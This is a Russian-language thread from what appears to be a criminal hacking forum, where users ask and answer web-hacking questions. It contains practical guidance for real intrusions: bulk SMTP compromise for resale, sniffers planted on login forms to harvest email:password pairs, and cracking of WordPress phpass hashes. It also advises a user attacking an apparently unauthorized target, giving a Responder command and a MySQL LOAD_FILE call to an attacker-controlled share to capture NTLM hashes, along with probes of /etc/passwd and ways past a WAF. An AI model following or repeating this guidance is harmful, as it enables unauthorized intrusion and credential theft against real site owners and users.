• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Как можно взломать SMTP в большом количестве без применения брутфорса? Я слышал от одной птички, что люди, которые получают и продают SMTP по большей части высокого качества, используют только список диапазонов IP, и не так много брутфорса задействовано... буду благодарен любому, кто заполнит пробелы, пожалуйста :D
 
Что если кто-то стырил все сессии имена логина Microsoft ? Стоит ли полностью переустановить операционную систему? Произошло после того как я шарил на ресурсе SEO крякнутых сайтов и покупал ссылки :) Google вроде нормально.
 

Вложения

  • foto_no_exif.png
    foto_no_exif.png
    72.2 КБ · Просмотры: 38
на каких сайтах можно потестить xss?
локальные варианты куда лучше, ты можешь видеть логи и понимать как доходит твой запрос. Хотя для XSS ето не важно но для других уязвимостей очень супер гига ультра важно.
 
до сих пор встречаются самописные движки, где хранятся пасы в откытом виде. Также можно поставить снифер на форму входа и собирать mail:pass если рес посещаемый. Ну и расшифровывают, конечно, если тип хеша не сильно напряжный как bcrypt или wordpressовский.
 
до сих пор встречаются самописные движки, где хранятся пасы в откытом виде. Также можно поставить снифер на форму входа и собирать mail:pass если рес посещаемый. Ну и расшифровывают, конечно, если тип хеша не сильно напряжный как bcrypt или wordpressовский.
bcrypt не сильно напряжный?) хотя у кого есть лишних пару сокту лет мб и расшифруются😁
 
Последнее редактирование:
Может я чуть не так выразился, я имел ввиду, что bcrypt как раз таки и напряжен :D
 
bcrypt не сильно напряжны?) хотя у кого если лишних пару сокту лет мб и расшифруются😁
Да, с bcrypt полная жопа, вроде читал, что некие энтузиасты на армах собрали для него адекватный брутер, но на видюхах его действительно не вариант брутить, а вот phpass (который wordpress) - вполне легко брутится, не чистый md5, конечно, но вполне в обозримом будущем, если по словарикам гонять.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
до сих пор встречаются самописные движки, где хранятся пасы в откытом виде. Также можно поставить снифер на форму входа и собирать mail:pass если рес посещаемый. Ну и расшифровывают, конечно, если тип хеша не сильно напряжный как bcrypt или wordpressовский.
Поставить снифер это правда хорошая идея. Даже на те ресурсы которые 10 раз уже переслиты дамперов. Найдутся строки, которые сбрутить не удалось ранее. т.к пасс сложный.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ребят, помогите, что делать при таких ошибках? Посмотреть вложение 104399
403, или рейт-лимит, или ваф фильтрует. Руками надо проверять в чем дело: http://xssforum7mmh3n56inuf2h73hvhn...xdnyd.onion/threads/14482/page-30#post-571373
 
Нельзя, если у вас запрос SELECT и нет stacked то как вы собрались делать UPDATE/INSERT.
stacked - в MySQL/Maria не частое явление.
Нужно искать в другом месте инжект, желательно в полях где информация потенциально обновляется - адрес, ник, пароль, интересы итд.


responder -I eth0
SELECT LOAD_FILE('\\\\attacker\\share\\payload.txt');

Если сервер MySQL запущен под учетной записью с сетевыми привилегиями, Windows отправит аутентификацию NTLM
Приветствую,хотел бы еще услышать ваш совет о том как продвинуться дальше с маленьким предисловием и дополнением к прошлой информации.Разобрался с респондером(хэш не получил) , про win сервер я писал из-за того что sqlmap
рисовал такой баннер :

[12:58:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2019 or 10 or 2016
web application technology: Microsoft IIS 10.0, ColdFusion, ASP.NET
back-end DBMS: MySQL >= 5.0.0

Но когда начал дальше ковырять базу увидел что если я в --sql-shell ввожу команды (select @@version_compile_os, @@version_compile_machine, @@plugin_dir) в ответе Linux x86_64 ,'/usr/lib/mysql/plugin/'

попробовал select load_file('/etc/passwd') ответ пустой , хотя --is-dba:true и в --privileges права на всё

что еще можно попробовать ? и возможно есть какая-то информация о том как найти соль для паролей в MySQL,самому найти не получилось.
 
попробовал select load_file('/etc/passwd') ответ пустой , хотя --is-dba:true и в --privileges права на всё
я бы уделил этому внимание, возможно блокирует какой нибудь WAF. Это очень жирный вектор для продвижения в глубь. Пробуй разные варианты с чтением, разные команды, разные файлы. Ну и для начала хотя бы версию сервера узнай точную.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх